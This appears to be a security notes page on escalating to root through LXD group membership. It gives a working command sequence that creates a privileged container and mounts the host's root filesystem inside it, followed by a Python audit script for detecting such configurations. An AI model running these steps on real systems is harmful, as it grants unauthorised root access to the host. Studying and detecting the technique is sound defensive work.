LXD/LXC

LXD - Linux Daemon

LXC - Linux Containers

Pre-Requisites

  • Must be a member of the lxd group

Sample Exploitation

  1. Run the id command and check for membership in the lxd group

    $ id
    
    uid=1000(container-user) gid=1000(container-user) groups=1000(container-user),116(lxd)
  2. From here, there are several ways to exploit LXC/LXD. We can either create our own container and transfer it to the target system, or use an existing container.

    $ cd ContainerImages
    $ ls
    
    ubuntu-template.tar.xz
  3. Assuming there are no protections in place (passwords, etc.), import the container as an image

    $ lxc image import ubuntu-template.tar.xz --alias ubuntutemp
    $ lxc image list
    
    +-------------------------------------+--------------+--------+-----------------------------------------+--------------+-----------------+-----------+-------------------------------+
    |                ALIAS                | FINGERPRINT  | PUBLIC |               DESCRIPTION               | ARCHITECTURE |      TYPE       |   SIZE    |          UPLOAD DATE          |
    +-------------------------------------+--------------+--------+-----------------------------------------+--------------+-----------------+-----------+-------------------------------+
    | ubuntu/18.04 (v1.1.2)               | 623c9f0bde47 | no    | Ubuntu bionic amd64 (20221024_11:49)     | x86_64       | CONTAINER       | 106.49MB  | Oct 24, 2022 at 12:00am (UTC) |
    +-------------------------------------+--------------+--------+-----------------------------------------+--------------+-----------------+-----------+-------------------------------+
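  4. Create a container with the security.privileged flag enabled (container root is then not remapped to an unprivileged host UID) and attach the host's / as a disk device at /mnt/root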

    $ lxc init ubuntutemp privesc -c security.privileged=true
    $ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
  5. Start the container and open a shell in it; the host filesystem is visible under /mnt/root

    $ lxc start privesc
    $ lxc exec privesc /bin/bash
    # ls -l /mnt/root
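
For detection, the configuration produced by steps 4 and 5 can be audited from the host. The following is an added example, not part of the original notes: it flags instances that set security.privileged or mount the host's / as a disk device, and lists lxd group members. The sample data is constructed; it assumes the `expanded_config` / `expanded_devices` fields of `lxc list --format json` and the standard /etc/group format.

```python
import json

# Constructed sample in the shape of `lxc list --format json` (not from a real host).
SAMPLE_INSTANCES = json.loads("""
[
  {"name": "privesc",
   "expanded_config": {"security.privileged": "true"},
   "expanded_devices": {
     "host-root": {"type": "disk", "source": "/", "path": "/mnt/root", "recursive": "true"}}},
  {"name": "web01",
   "expanded_config": {},
   "expanded_devices": {"root": {"type": "disk", "pool": "default", "path": "/"}}}
]
""")

# Constructed /etc/group lines matching the `id` output above.
SAMPLE_GROUP = ["sudo:x:27:admin", "lxd:x:116:container-user"]

TRUTHY = {"true", "1", "yes", "on"}  # values LXD treats as boolean true


def lxd_group_members(group_lines, group="lxd"):
    """Return accounts listed as supplementary members of the lxd group."""
    for line in group_lines:
        fields = line.strip().split(":")
        if len(fields) == 4 and fields[0] == group:
            return [m for m in fields[3].split(",") if m]
    return []


def audit_instances(instances):
    """Return (instance, finding) pairs for privileged mode and host-root mounts."""
    findings = []
    for inst in instances:
        cfg = inst.get("expanded_config") or inst.get("config") or {}
        devs = inst.get("expanded_devices") or inst.get("devices") or {}
        if str(cfg.get("security.privileged", "")).lower() in TRUTHY:
            findings.append((inst["name"], "security.privileged=true"))
        for dev_name, dev in devs.items():
            src = dev.get("source", "")
            # A pool-backed root disk has no "source"; a host path mount does.
            if dev.get("type") == "disk" and src.startswith("/") and not src.strip("/"):
                findings.append((inst["name"], f"host / mounted via device {dev_name}"))
    return findings


if __name__ == "__main__":
    print("lxd group members:", lxd_group_members(SAMPLE_GROUP))
    for name, finding in audit_instances(SAMPLE_INSTANCES):
        print(f"{name}: {finding}")
```

On a real host, feed `audit_instances` the parsed output of `lxc list --format json` and `lxd_group_members` the lines of /etc/group; accounts whose primary group is lxd are not listed there and need a separate check against /etc/passwd.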
